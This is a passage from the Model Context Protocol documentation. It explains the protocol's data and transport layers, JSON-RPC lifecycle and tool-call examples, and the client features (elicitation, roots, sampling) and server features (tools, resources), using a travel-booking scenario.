Sentry platform, and uses the Streamable HTTP transport. This is commonly
referred to as a "remote" MCP server.
### Layers
MCP consists of two layers:
* **Data layer**: Defines the JSON-RPC based protocol for client-server communication, including lifecycle management, and core primitives, such as tools, resources, prompts and notifications.
* **Transport layer**: Defines the communication mechanisms and channels that enable data exchange between clients and servers, including transport-specific connection establishment, message framing, and authorization.
Conceptually the data layer is the inner layer, while the transport layer is the outer layer.
#### Data layer
The data layer implements a [JSON-RPC 2.0](https://www.jsonrpc.org/) based exchange protocol that defines the message structure and semantics.
This layer includes:
* **Lifecycle management**: Handles connection initialization, capability negotiation, and connection termination between clients and servers
* **Server features**: Enables servers to provide core functionality to clients, including tools for AI actions, resources for context data, and prompts for interaction templates
* **Client features**: Enables servers to ask the client to sample from the host LLM, elicit input from the user, and log messages to the client
* **Utility features**: Supports additional capabilities like notifications for real-time updates and progress tracking for long-running operations
#### Transport layer
The transport layer manages communication channels and authentication between clients and servers. It handles connection establishment, message framing, and secure communication between MCP participants.
MCP supports two transport mechanisms:
* **Stdio transport**: Uses standard input/output streams for direct process communication between local processes on the same machine, providing optimal performance with no network overhead.
* **Streamable HTTP transport**: Uses HTTP POST for client-to-server messages with optional Server-Sent Events for streaming capabilities. This transport enables remote server communication and supports standard HTTP authentication methods including bearer tokens, API keys, and custom headers. MCP recommends using OAuth to obtain authentication tokens.
The transport layer abstracts communication details from the protocol layer, enabling the same JSON-RPC 2.0 message format across all transport mechanisms.
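For instance, with the TypeScript SDK the same client code can run over either transport; only the transport construction differs. The sketch below uses placeholder paths and URLs:
```typescript theme={null}
import { Client } from "@modelcontextprotocol/sdk/client/index.js";
import { StdioClientTransport } from "@modelcontextprotocol/sdk/client/stdio.js";
import { StreamableHTTPClientTransport } from "@modelcontextprotocol/sdk/client/streamableHttp.js";

const client = new Client({ name: "example-client", version: "1.0.0" });

// Local server: spawn a process and exchange messages over stdin/stdout
const stdioTransport = new StdioClientTransport({
  command: "node",
  args: ["./server.js"], // placeholder path
});

// Remote server: the same JSON-RPC messages over Streamable HTTP
const httpTransport = new StreamableHTTPClientTransport(
  new URL("https://example.com/mcp"), // placeholder URL
);

// The data layer is identical either way
await client.connect(stdioTransport); // or: await client.connect(httpTransport)
const { tools } = await client.listTools();
console.log(tools.map((tool) => tool.name));
```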
### Data Layer Protocol
A core part of MCP is defining the schema and semantics between MCP clients and MCP servers. Developers will likely find the data layer — in particular, the set of [primitives](#primitives) — to be the most interesting part of MCP. It is the part of MCP that defines the ways developers can share context from MCP servers to MCP clients.
MCP uses [JSON-RPC 2.0](https://www.jsonrpc.org/) as its underlying RPC protocol. Clients and servers send requests to each other and respond accordingly. Notifications can be used when no response is required.
#### Lifecycle management
MCP is a stateful protocol that requires lifecycle management. The purpose of lifecycle management is to negotiate the capabilities that both client and server support. Detailed information can be found in the [specification](/specification/latest/basic/lifecycle), and the [example](#example) showcases the initialization sequence.
#### Primitives
MCP primitives are the most important concept within MCP. They define what clients and servers can offer each other. These primitives specify the types of contextual information that can be shared with AI applications and the range of actions that can be performed.
MCP defines three core primitives that *servers* can expose:
* **Tools**: Executable functions that AI applications can invoke to perform actions (e.g., file operations, API calls, database queries)
* **Resources**: Data sources that provide contextual information to AI applications (e.g., file contents, database records, API responses)
* **Prompts**: Reusable templates that help structure interactions with language models (e.g., system prompts, few-shot examples)
Each primitive type has associated methods for discovery (`*/list`), retrieval (`*/get`), and in some cases, execution (`tools/call`).
MCP clients will use the `*/list` methods to discover available primitives. For example, a client can first list all available tools (`tools/list`) and then execute them. This design allows listings to be dynamic.
As a concrete example, consider an MCP server that provides context about a database. It can expose tools for querying the database, a resource that contains the schema of the database, and a prompt that includes few-shot examples for interacting with the tools.
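A sketch of such a server using the TypeScript SDK might look like the following; the names, schema text, and the `runQuery` helper are placeholders rather than a real implementation:
```typescript theme={null}
import { McpServer } from "@modelcontextprotocol/sdk/server/mcp.js";
import { z } from "zod";

// Hypothetical database helper, stubbed for illustration
async function runQuery(sql: string): Promise<unknown[]> {
  return []; // a real server would query the database here
}

const server = new McpServer({ name: "database-server", version: "1.0.0" });

// Tool: execute a read-only query
server.registerTool(
  "query",
  {
    description: "Run a read-only SQL query against the database",
    inputSchema: { sql: z.string() },
  },
  async ({ sql }) => ({
    content: [{ type: "text", text: JSON.stringify(await runQuery(sql)) }],
  }),
);

// Resource: the database schema as context
server.registerResource(
  "schema",
  "db://schema",
  { mimeType: "text/plain" },
  async (uri) => ({
    contents: [{ uri: uri.href, text: "CREATE TABLE users (...);" }],
  }),
);

// Prompt: few-shot examples for interacting with the query tool
server.registerPrompt(
  "query-examples",
  { description: "Few-shot examples for querying this database" },
  () => ({
    messages: [
      {
        role: "user",
        content: {
          type: "text",
          text: "Example: list all users -> call query with SELECT * FROM users;",
        },
      },
    ],
  }),
);
```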
For more details about server primitives see [server concepts](./server-concepts).
MCP also defines primitives that *clients* can expose. These primitives allow MCP server authors to build richer interactions.
* **Sampling**: Allows servers to request language model completions from the client's AI application. This is useful when server authors want access to a language model but want to stay model-independent and avoid bundling a language model SDK in their MCP server. They can use the `sampling/createMessage` method to request a language model completion from the client's AI application.
* **Elicitation**: Allows servers to request additional information from users. This is useful when server authors need more information from the user or want to ask for confirmation of an action. They can use the `elicitation/create` method to request additional information from the user.
* **Logging**: Enables servers to send log messages to clients for debugging and monitoring purposes.
For more details about client primitives see [client concepts](./client-concepts).
Besides server and client primitives, the protocol offers cross-cutting utility primitives that augment how requests are executed:
* **Tasks (Experimental)**: Durable execution wrappers that enable deferred result retrieval and status tracking for MCP requests (e.g., expensive computations, workflow automation, batch processing, multi-step operations)
#### Notifications
The protocol supports real-time notifications to enable dynamic updates between servers and clients. For example, when a server's available tools change—such as when new functionality becomes available or existing tools are modified—the server can send tool update notifications to inform connected clients about these changes. Notifications are sent as JSON-RPC 2.0 notification messages (without expecting a response) and enable MCP servers to provide real-time updates to connected clients.
## Example
### Data Layer
This section provides a step-by-step walkthrough of an MCP client-server interaction, focusing on the data layer protocol. We'll demonstrate the lifecycle sequence, tool operations, and notifications using JSON-RPC 2.0 messages.
MCP begins with lifecycle management through a capability negotiation handshake. As described in the [lifecycle management](#lifecycle-management) section, the client sends an `initialize` request to establish the connection and negotiate supported features.
```json Initialize Request theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "initialize",
"params": {
"protocolVersion": "2025-06-18",
"capabilities": {
"elicitation": {}
},
"clientInfo": {
"name": "example-client",
"version": "1.0.0"
}
}
}
```
```json Initialize Response theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"protocolVersion": "2025-06-18",
"capabilities": {
"tools": {
"listChanged": true
},
"resources": {}
},
"serverInfo": {
"name": "example-server",
"version": "1.0.0"
}
}
}
```
#### Understanding the Initialization Exchange
The initialization process is a key part of MCP's lifecycle management and serves several critical purposes:
1. **Protocol Version Negotiation**: The `protocolVersion` field (e.g., "2025-06-18") ensures both client and server are using compatible protocol versions. This prevents communication errors that could occur when different versions attempt to interact. If a mutually compatible version is not negotiated, the connection should be terminated.
2. **Capability Discovery**: The `capabilities` object allows each party to declare what features they support, including which [primitives](#primitives) they can handle (tools, resources, prompts) and whether they support features like [notifications](#notifications). This enables efficient communication by avoiding unsupported operations.
3. **Identity Exchange**: The `clientInfo` and `serverInfo` objects provide identification and versioning information for debugging and compatibility purposes.
In this example, the capability negotiation demonstrates how MCP primitives are declared:
**Client Capabilities**:
* `"elicitation": {}` - The client declares it can work with user interaction requests (can receive `elicitation/create` method calls)
**Server Capabilities**:
* `"tools": {"listChanged": true}` - The server supports the tools primitive AND can send `tools/list_changed` notifications when its tool list changes
* `"resources": {}` - The server also supports the resources primitive (can handle `resources/list` and `resources/read` methods)
After successful initialization, the client sends a notification to indicate it's ready:
```json Notification theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/initialized"
}
```
#### How This Works in AI Applications
During initialization, the AI application's MCP client manager establishes connections to configured servers and stores their capabilities for later use. The application uses this information to determine which servers can provide specific types of functionality (tools, resources, prompts) and whether they support real-time updates.
```python Pseudo-code for AI application initialization theme={null}
# Pseudo Code
async with stdio_client(server_config) as (read, write):
async with ClientSession(read, write) as session:
init_response = await session.initialize()
if init_response.capabilities.tools:
app.register_mcp_server(session, supports_tools=True)
app.set_server_ready(session)
```
Now that the connection is established, the client can discover available tools by sending a `tools/list` request. This request is fundamental to MCP's tool discovery mechanism — it allows clients to understand what tools are available on the server before attempting to use them.
```json Tools List Request theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"method": "tools/list"
}
```
```json Tools List Response theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"tools": [
{
"name": "calculator_arithmetic",
"title": "Calculator",
"description": "Perform mathematical calculations including basic arithmetic, trigonometric functions, and algebraic operations",
"inputSchema": {
"type": "object",
"properties": {
"expression": {
"type": "string",
"description": "Mathematical expression to evaluate (e.g., '2 + 3 * 4', 'sin(30)', 'sqrt(16)')"
}
},
"required": ["expression"]
}
},
{
"name": "weather_current",
"title": "Weather Information",
"description": "Get current weather information for any location worldwide",
"inputSchema": {
"type": "object",
"properties": {
"location": {
"type": "string",
"description": "City name, address, or coordinates (latitude,longitude)"
},
"units": {
"type": "string",
"enum": ["metric", "imperial", "kelvin"],
"description": "Temperature units to use in response",
"default": "metric"
}
},
"required": ["location"]
}
}
]
}
}
```
#### Understanding the Tool Discovery Request
The `tools/list` request is simple, containing no parameters.
#### Understanding the Tool Discovery Response
The response contains a `tools` array that provides comprehensive metadata about each available tool. This array-based structure allows servers to expose multiple tools simultaneously while maintaining clear boundaries between different functionalities.
Each tool object in the response includes several key fields:
* **`name`**: A unique identifier for the tool within the server's namespace. This serves as the primary key for tool execution and should follow a clear naming pattern (e.g., `calculator_arithmetic` rather than just `calculate`)
* **`title`**: A human-readable display name for the tool that clients can show to users
* **`description`**: Detailed explanation of what the tool does and when to use it
* **`inputSchema`**: A JSON Schema that defines the expected input parameters, enabling type validation and providing clear documentation about required and optional parameters
#### How This Works in AI Applications
The AI application fetches available tools from all connected MCP servers and combines them into a unified tool registry that the language model can access. This allows the LLM to understand what actions it can perform and automatically generates the appropriate tool calls during conversations.
```python Pseudo-code for AI application tool discovery theme={null}
# Pseudo-code using MCP Python SDK patterns
available_tools = []
for session in app.mcp_server_sessions():
tools_response = await session.list_tools()
available_tools.extend(tools_response.tools)
conversation.register_available_tools(available_tools)
```
The client can now execute a tool using the `tools/call` method. This demonstrates how MCP primitives are used in practice: after discovering available tools, the client can invoke them with appropriate arguments.
#### Understanding the Tool Execution Request
The `tools/call` request follows a structured format that ensures type safety and clear communication between client and server. Note that we're using the proper tool name from the discovery response (`weather_current`) rather than a simplified name:
```json Tool Call Request theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"method": "tools/call",
"params": {
"name": "weather_current",
"arguments": {
"location": "San Francisco",
"units": "imperial"
}
}
}
```
```json Tool Call Response theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"result": {
"content": [
{
"type": "text",
"text": "Current weather in San Francisco: 68°F, partly cloudy with light winds from the west at 8 mph. Humidity: 65%"
}
]
}
}
```
#### Key Elements of Tool Execution
The request structure includes several important components:
1. **`name`**: Must match exactly the tool name from the discovery response (`weather_current`). This ensures the server can correctly identify which tool to execute.
2. **`arguments`**: Contains the input parameters as defined by the tool's `inputSchema`. In this example:
* `location`: "San Francisco" (required parameter)
* `units`: "imperial" (optional parameter, defaults to "metric" if not specified)
3. **JSON-RPC Structure**: Uses standard JSON-RPC 2.0 format with unique `id` for request-response correlation.
#### Understanding the Tool Execution Response
The response demonstrates MCP's flexible content system:
1. **`content` Array**: Tool responses return an array of content objects, allowing for rich, multi-format responses (text, images, resources, etc.)
2. **Content Types**: Each content object has a `type` field. In this example, `"type": "text"` indicates plain text content, but MCP supports various content types for different use cases.
3. **Structured Output**: The response provides actionable information that the AI application can use as context for language model interactions.
This execution pattern allows AI applications to dynamically invoke server functionality and receive structured responses that can be integrated into conversations with language models.
#### How This Works in AI Applications
When the language model decides to use a tool during a conversation, the AI application intercepts the tool call, routes it to the appropriate MCP server, executes it, and returns the results back to the LLM as part of the conversation flow. This enables the LLM to access real-time data and perform actions in the external world.
```python theme={null}
# Pseudo-code for AI application tool execution
async def handle_tool_call(conversation, tool_name, arguments):
session = app.find_mcp_session_for_tool(tool_name)
result = await session.call_tool(tool_name, arguments)
conversation.add_tool_result(result.content)
```
MCP supports real-time notifications that enable servers to inform clients about changes without being explicitly requested. This demonstrates the notification system, a key feature that keeps MCP connections synchronized and responsive.
#### Understanding Tool List Change Notifications
When the server's available tools change—such as when new functionality becomes available, existing tools are modified, or tools become temporarily unavailable—the server can proactively notify connected clients:
```json Notification theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/tools/list_changed"
}
```
#### Key Features of MCP Notifications
1. **No Response Required**: Notice there's no `id` field in the notification. This follows JSON-RPC 2.0 notification semantics where no response is expected or sent.
2. **Capability-Based**: This notification is only sent by servers that declared `"listChanged": true` in their tools capability during initialization (as shown in Step 1).
3. **Event-Driven**: The server decides when to send notifications based on internal state changes, making MCP connections dynamic and responsive.
#### Client Response to Notifications
Upon receiving this notification, the client typically reacts by requesting the updated tool list. This creates a refresh cycle that keeps the client's understanding of available tools current:
```json Request theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"method": "tools/list"
}
```
#### Why Notifications Matter
This notification system is crucial for several reasons:
1. **Dynamic Environments**: Tools may come and go based on server state, external dependencies, or user permissions
2. **Efficiency**: Clients don't need to poll for changes; they're notified when updates occur
3. **Consistency**: Ensures clients always have accurate information about available server capabilities
4. **Real-time Collaboration**: Enables responsive AI applications that can adapt to changing contexts
This notification pattern extends beyond tools to other MCP primitives, enabling comprehensive real-time synchronization between clients and servers.
#### How This Works in AI Applications
When the AI application receives a notification about changed tools, it immediately refreshes its tool registry and updates the LLM's available capabilities. This ensures that ongoing conversations always have access to the most current set of tools, and the LLM can dynamically adapt to new functionality as it becomes available.
```python theme={null}
# Pseudo-code for AI application notification handling
async def handle_tools_changed_notification(session):
tools_response = await session.list_tools()
app.update_available_tools(session, tools_response.tools)
if app.conversation.is_active():
app.conversation.notify_llm_of_new_capabilities()
```
# Understanding MCP clients
Source: https://modelcontextprotocol.io/docs/learn/client-concepts
MCP clients are instantiated by host applications to communicate with particular MCP servers. The host application, like Claude.ai or an IDE, manages the overall user experience and coordinates multiple clients. Each client handles one direct communication with one server.
Understanding the distinction is important: the *host* is the application users interact with, while *clients* are the protocol-level components that enable server connections.
## Core Client Features
In addition to making use of context provided by servers, clients may provide several features to servers. These client features allow server authors to build richer interactions.
| Feature | Explanation | Example |
| --------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------- |
| **Elicitation** | Elicitation enables servers to request specific information from users during interactions, providing a structured way for servers to gather information on demand. | A server booking travel may ask for the user's preferences on airplane seats, room type or their contact number to finalize a booking. |
| **Roots** | Roots allow clients to specify which directories servers should focus on, communicating intended scope through a coordination mechanism. | A server for booking travel may be given access to a specific directory, from which it can read a user's calendar. |
| **Sampling** | Sampling allows servers to request LLM completions through the client, enabling an agentic workflow. This approach puts the client in complete control of user permissions and security measures. | A server for booking travel may send a list of flights to an LLM and request that the LLM pick the best flight for the user. |
### Elicitation
Elicitation enables servers to request specific information from users during interactions, creating more dynamic and responsive workflows.
#### Overview
Elicitation provides a structured way for servers to gather necessary information on demand. Instead of requiring all information up front or failing when data is missing, servers can pause their operations to request specific inputs from users. This creates more flexible interactions where servers adapt to user needs rather than following rigid patterns.
**Elicitation flow:**
```mermaid theme={null}
sequenceDiagram
participant User
participant Client
participant Server
Note over Server,Client: Server initiates elicitation
Server->>Client: elicitation/create
Note over Client,User: Human interaction
Client->>User: Present elicitation UI
User-->>Client: Provide requested information
Note over Server,Client: Complete request
Client-->>Server: Return user response
Note over Server: Continue processing with new information
```
The flow enables dynamic information gathering. Servers can request specific data when needed, users provide information through appropriate UI, and servers continue processing with the newly acquired context.
**Elicitation components example:**
```typescript theme={null}
{
method: "elicitation/requestInput",
params: {
message: "Please confirm your Barcelona vacation booking details:",
schema: {
type: "object",
properties: {
confirmBooking: {
type: "boolean",
description: "Confirm the booking (Flights + Hotel = $3,000)"
},
seatPreference: {
type: "string",
enum: ["window", "aisle", "no preference"],
description: "Preferred seat type for flights"
},
roomType: {
type: "string",
enum: ["sea view", "city view", "garden view"],
description: "Preferred room type at hotel"
},
travelInsurance: {
type: "boolean",
default: false,
description: "Add travel insurance ($150)"
}
},
required: ["confirmBooking"]
}
}
}
```
#### Example: Holiday Booking Approval
A travel booking server demonstrates elicitation's power through the final booking confirmation process. When a user has selected their ideal vacation package to Barcelona, the server needs to gather final approval and any missing details before proceeding.
The server elicits booking confirmation with a structured request that includes the trip summary (Barcelona flights June 15-22, beachfront hotel, total $3,000) and fields for any additional preferences—such as seat selection, room type, or travel insurance options.
As the booking progresses, the server elicits contact information needed to complete the reservation. It might ask for traveler details for flight bookings, special requests for the hotel, or emergency contact information.
#### User Interaction Model
Elicitation interactions are designed to be clear, contextual, and respectful of user autonomy:
**Request presentation**: Clients display elicitation requests with clear context about which server is asking, why the information is needed, and how it will be used. The request message explains the purpose while the schema provides structure and validation.
**Response options**: Users can provide the requested information through appropriate UI controls (text fields, dropdowns, checkboxes), decline to provide information with optional explanation, or cancel the entire operation. Clients validate responses against the provided schema before returning them to servers.
**Privacy considerations**: Elicitation never requests passwords or API keys. Clients warn about suspicious requests and let users review data before sending.
### Roots
Roots define filesystem boundaries for server operations, allowing clients to specify which directories servers should focus on.
#### Overview
Roots are a mechanism for clients to communicate filesystem access boundaries to servers. They consist of file URIs that indicate directories where servers can operate, helping servers understand the scope of available files and folders. While roots communicate intended boundaries, they do not enforce security restrictions. Actual security must be enforced at the operating system level, via file permissions and/or sandboxing.
**Root structure:**
```json theme={null}
{
"uri": "file:///Users/agent/travel-planning",
"name": "Travel Planning Workspace"
}
```
Roots are exclusively filesystem paths and always use the `file://` URI scheme. They help servers understand project boundaries, workspace organization, and accessible directories. The roots list can be updated dynamically as users work with different projects or folders, with servers receiving notifications through `roots/list_changed` when boundaries change.
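As a minimal sketch, a client built with the TypeScript SDK could advertise the root above by declaring the `roots` capability and answering `roots/list` requests; a real host would derive this list from the folders the user has opened:
```typescript theme={null}
import { Client } from "@modelcontextprotocol/sdk/client/index.js";
import { ListRootsRequestSchema } from "@modelcontextprotocol/sdk/types.js";

// Declare the roots capability so servers know they can ask for roots
const client = new Client(
  { name: "example-client", version: "1.0.0" },
  { capabilities: { roots: { listChanged: true } } },
);

// Answer roots/list requests with the directories currently in scope
client.setRequestHandler(ListRootsRequestSchema, async () => ({
  roots: [
    {
      uri: "file:///Users/agent/travel-planning",
      name: "Travel Planning Workspace",
    },
  ],
}));
```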
#### Example: Travel Planning Workspace
A travel agent working with multiple client trips benefits from roots to organize filesystem access. Consider a workspace with different directories for various aspects of travel planning.
The client provides filesystem roots to the travel planning server:
* `file:///Users/agent/travel-planning` - Main workspace containing all travel files
* `file:///Users/agent/travel-templates` - Reusable itinerary templates and resources
* `file:///Users/agent/client-documents` - Client passports and travel documents
When the agent creates a Barcelona itinerary, well-behaved servers respect these boundaries—accessing templates, saving the new itinerary, and referencing client documents within the specified roots. Servers typically access files within roots by using relative paths from the root directories or by utilizing file search tools that respect the root boundaries.
If the agent opens an archive folder like `file:///Users/agent/archive/2023-trips`, the client updates the roots list via `roots/list_changed`.
For a complete implementation of a server that respects roots, see the [filesystem server](https://github.com/modelcontextprotocol/servers/tree/main/src/filesystem) in the official servers repository.
#### Design Philosophy
Roots serve as a coordination mechanism between clients and servers, not a security boundary. The specification requires that servers "SHOULD respect root boundaries," and not that they "MUST enforce" them, because servers run code the client cannot control.
Roots work best when servers are trusted or vetted, users understand their advisory nature, and the goal is preventing accidents rather than stopping malicious behavior. They excel at context scoping (telling servers where to focus), accident prevention (helping well-behaved servers stay in bounds), and workflow organization (such as managing project boundaries automatically).
#### User Interaction Model
Roots are typically managed automatically by host applications based on user actions, though some applications may expose manual root management:
**Automatic root detection**: When users open folders, clients automatically expose them as roots. Opening a travel workspace allows the client to expose that directory as a root, helping servers understand which itineraries and documents are in scope for the current work.
**Manual root configuration**: Advanced users can specify roots through configuration. For example, adding `/travel-templates` for reusable resources while excluding directories with financial records.
### Sampling
Sampling allows servers to request language model completions through the client, enabling agentic behaviors while maintaining security and user control.
#### Overview
Sampling enables servers to perform AI-dependent tasks without directly integrating with or paying for AI models. Instead, servers can request that the client—which already has AI model access—handle these tasks on their behalf. This approach puts the client in complete control of user permissions and security measures. Because sampling requests occur within the context of other operations—like a tool analyzing data—and are processed as separate model calls, they maintain clear boundaries between different contexts, allowing for more efficient use of the context window.
**Sampling flow:**
```mermaid theme={null}
sequenceDiagram
participant LLM
participant User
participant Client
participant Server
Note over Server,Client: Server initiates sampling
Server->>Client: sampling/createMessage
Note over Client,User: Human-in-the-loop review
Client->>User: Present request for approval
User-->>Client: Review and approve/modify
Note over Client,LLM: Model interaction
Client->>LLM: Forward approved request
LLM-->>Client: Return generation
Note over Client,User: Response review
Client->>User: Present response for approval
User-->>Client: Review and approve/modify
Note over Server,Client: Complete request
Client-->>Server: Return approved response
```
The flow ensures security through multiple human-in-the-loop checkpoints. Users review and can modify both the initial request and the generated response before it returns to the server.
**Request parameters example:**
```typescript theme={null}
{
messages: [
{
role: "user",
content: "Analyze these flight options and recommend the best choice:\n" +
"[47 flights with prices, times, airlines, and layovers]\n" +
"User preferences: morning departure, max 1 layover"
}
],
modelPreferences: {
hints: [{
name: "claude-sonnet-4-20250514" // Suggested model
}],
costPriority: 0.3, // Less concerned about API cost
speedPriority: 0.2, // Can wait for thorough analysis
intelligencePriority: 0.9 // Need complex trade-off evaluation
},
systemPrompt: "You are a travel expert helping users find the best flights based on their preferences",
maxTokens: 1500
}
```
#### Example: Flight Analysis Tool
Consider a travel booking server with a tool called `findBestFlight` that uses sampling to analyze available flights and recommend the optimal choice. When a user asks "Book me the best flight to Barcelona next month," the tool needs AI assistance to evaluate complex trade-offs.
The tool queries airline APIs and gathers 47 flight options. It then requests AI assistance to analyze these options: "Analyze these flight options and recommend the best choice: \[47 flights with prices, times, airlines, and layovers] User preferences: morning departure, max 1 layover."
The client initiates the sampling request, allowing the AI to evaluate trade-offs—like cheaper red-eye flights versus convenient morning departures. The tool uses this analysis to present the top three recommendations.
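The completion returns to the server as a standard `sampling/createMessage` result. A sketch of what the tool might receive (the recommendation text is illustrative):

```typescript theme={null}
// Illustrative sampling/createMessage result
{
  role: "assistant",
  content: {
    type: "text",
    text: "Recommended: the 9:30 AM nonstop at $720 best matches the morning-departure preference..."
  },
  model: "claude-sonnet-4-20250514", // the model the client actually used
  stopReason: "endTurn"
}
```

Depending on client settings, the user may have reviewed or edited both the request and this response before it reached the tool.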
#### User Interaction Model
While not a requirement, sampling is designed to allow human-in-the-loop control. Users can maintain oversight through several mechanisms:
**Approval controls**: Sampling requests may require explicit user consent. Clients can show what the server wants to analyze and why. Users can approve, deny, or modify requests.
**Transparency features**: Clients can display the exact prompt, model selection, and token limits, allowing users to review AI responses before they return to the server.
**Configuration options**: Users can set model preferences, configure auto-approval for trusted operations, or require approval for everything. Clients may provide options to redact sensitive information.
**Security considerations**: Both clients and servers must handle sensitive data appropriately during sampling. Clients should implement rate limiting and validate all message content. The human-in-the-loop design ensures that server-initiated AI interactions cannot compromise security or access sensitive data without explicit user consent.
# Understanding MCP servers
Source: https://modelcontextprotocol.io/docs/learn/server-concepts
MCP servers are programs that expose specific capabilities to AI applications through standardized protocol interfaces.
Common examples include file system servers for document access, database servers for data queries, GitHub servers for code management, Slack servers for team communication, and calendar servers for scheduling.
## Core Server Features
Servers provide functionality through three building blocks:
| Feature | Explanation | Examples | Who controls it |
| ------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------ | --------------- |
| **Tools** | Functions that the LLM can actively call; the model decides when to use them based on user requests. Tools can write to databases, call external APIs, modify files, or trigger other logic. | Search flights, send messages, create calendar events | Model |
| **Resources** | Passive data sources that provide read-only access to information for context, such as file contents, database schemas, or API documentation. | Retrieve documents, access knowledge bases, read calendars | Application |
| **Prompts** | Pre-built instruction templates that tell the model to work with specific tools and resources. | Plan a vacation, summarize my meetings, draft an email | User |
We will use a hypothetical scenario to demonstrate the role of each of these features, and show how they can work together.
### Tools
Tools enable AI models to perform actions. Each tool defines a specific operation with typed inputs and outputs. The model requests tool execution based on context.
#### How Tools Work
Tools are schema-defined interfaces that LLMs can invoke. MCP uses JSON Schema for validation. Each tool performs a single operation with clearly defined inputs and outputs. Tools may require user consent prior to execution, helping to ensure users maintain control over actions taken by a model.
**Protocol operations:**
| Method | Purpose | Returns |
| ------------ | ------------------------ | -------------------------------------- |
| `tools/list` | Discover available tools | Array of tool definitions with schemas |
| `tools/call` | Execute a specific tool | Tool execution result |
**Example tool definition:**
```typescript theme={null}
{
name: "searchFlights",
description: "Search for available flights",
inputSchema: {
type: "object",
properties: {
origin: { type: "string", description: "Departure city" },
destination: { type: "string", description: "Arrival city" },
date: { type: "string", format: "date", description: "Travel date" }
},
required: ["origin", "destination", "date"]
}
}
```
#### Example: Travel Booking
Tools enable AI applications to perform actions on behalf of users. In a travel planning scenario, the AI application might use several tools to help book a vacation:
**Flight Search**
```
searchFlights(origin: "NYC", destination: "Barcelona", date: "2024-06-15")
```
Queries multiple airlines and returns structured flight options.
**Calendar Blocking**
```
createCalendarEvent(title: "Barcelona Trip", startDate: "2024-06-15", endDate: "2024-06-22")
```
Marks the travel dates in the user's calendar.
**Email notification**
```
sendEmail(to: "team@work.com", subject: "Out of Office", body: "...")
```
Sends an automated out-of-office message to colleagues.
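On the wire, each of these actions is a `tools/call` request, and the server responds with content the model can read. A sketch for the flight search (the result text is illustrative):

```typescript theme={null}
// Illustrative tools/call request
{
  method: "tools/call",
  params: {
    name: "searchFlights",
    arguments: { origin: "NYC", destination: "Barcelona", date: "2024-06-15" }
  }
}

// Illustrative result
{
  content: [{ type: "text", text: "Found 12 flights. Cheapest nonstop departs 9:30 AM at $720." }],
  isError: false
}
```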
#### User Interaction Model
Tools are model-controlled, meaning AI models can discover and invoke them automatically. However, MCP emphasizes human oversight.
For trust and safety, applications can implement user control through mechanisms such as:
* Displaying available tools in the UI, enabling users to define whether a tool should be made available in specific interactions
* Approval dialogs for individual tool executions
* Permission settings for pre-approving certain safe operations
* Activity logs that show all tool executions with their results
### Resources
Resources provide structured access to information that the AI application can retrieve and provide to models as context.
#### How Resources Work
Resources expose data from files, APIs, databases, or any other source that an AI needs to understand context. Applications can access this information directly and decide how to use it - whether that's selecting relevant portions, searching with embeddings, or passing it all to the model.
Each resource has a unique URI (e.g., `file:///path/to/document.md`) and declares its MIME type for appropriate content handling.
Resources support two discovery patterns:
* **Direct Resources** - fixed URIs that point to specific data. Example: `calendar://events/2024` - returns calendar availability for 2024
* **Resource Templates** - dynamic URIs with parameters for flexible queries. Example:
* `travel://activities/{city}/{category}` - returns activities by city and category
* `travel://activities/barcelona/museums` - returns all museums in Barcelona
Resource Templates include metadata such as title, description, and expected MIME type, making them discoverable and self-documenting.
**Protocol operations:**
| Method | Purpose | Returns |
| -------------------------- | ------------------------------- | -------------------------------------- |
| `resources/list` | List available direct resources | Array of resource descriptors |
| `resources/templates/list` | Discover resource templates | Array of resource template definitions |
| `resources/read` | Retrieve resource contents | Resource data with metadata |
| `resources/subscribe` | Monitor resource changes | Subscription confirmation |
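For example, reading a direct resource is a single `resources/read` round trip. A sketch, with illustrative contents:

```typescript theme={null}
// Illustrative resources/read request
{ method: "resources/read", params: { uri: "calendar://events/2024" } }

// Illustrative result
{
  contents: [
    {
      uri: "calendar://events/2024",
      mimeType: "application/json",
      text: "[{ \"date\": \"2024-06-15\", \"status\": \"free\" }]"
    }
  ]
}
```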
#### Example: Getting Travel Planning Context
Continuing with the travel planning example, resources provide the AI application with access to relevant information:
* **Calendar data** (`calendar://events/2024`) - Checks user availability
* **Travel documents** (`file:///Documents/Travel/passport.pdf`) - Accesses important documents
* **Previous itineraries** (`trips://history/barcelona-2023`) - References past trips and preferences
The AI application retrieves these resources and decides how to process them, whether selecting a subset of data using embeddings or keyword search, or passing raw data directly to the model.
In this case, it provides calendar data, weather information, and travel preferences to the model, enabling it to check availability, look up weather patterns, and reference past travel preferences.
**Resource Template Examples:**
```json theme={null}
{
"uriTemplate": "weather://forecast/{city}/{date}",
"name": "weather-forecast",
"title": "Weather Forecast",
"description": "Get weather forecast for any city and date",
"mimeType": "application/json"
}
{
"uriTemplate": "travel://flights/{origin}/{destination}",
"name": "flight-search",
"title": "Flight Search",
"description": "Search available flights between cities",
"mimeType": "application/json"
}
```
These templates enable flexible queries. For weather data, users can access forecasts for any city/date combination. For flights, they can search routes between any two cities. When a user has entered "NYC" as the `origin` and begins typing "Bar" as the `destination`, the system can suggest "Barcelona (BCN)" or "Barbados (BGI)".
#### Parameter Completion
Dynamic resources support parameter completion. For example:
* Typing "Par" as input for `weather://forecast/{city}` might suggest "Paris" or "Park City"
* Typing "JFK" for `flights://search/{airport}` might suggest "JFK - John F. Kennedy International"
The system helps discover valid values without requiring exact format knowledge.
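These suggestions are served through the protocol's `completion/complete` method. A sketch of the exchange for the city example above:

```typescript theme={null}
// Illustrative completion/complete request for a resource template argument
{
  method: "completion/complete",
  params: {
    ref: { type: "ref/resource", uri: "weather://forecast/{city}/{date}" },
    argument: { name: "city", value: "Par" }
  }
}

// Illustrative result
{
  completion: { values: ["Paris", "Park City"], total: 2, hasMore: false }
}
```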
#### User Interaction Model
Resources are application-driven, giving them flexibility in how they retrieve, process, and present available context. Common interaction patterns include:
* Tree or list views for browsing resources in familiar folder-like structures
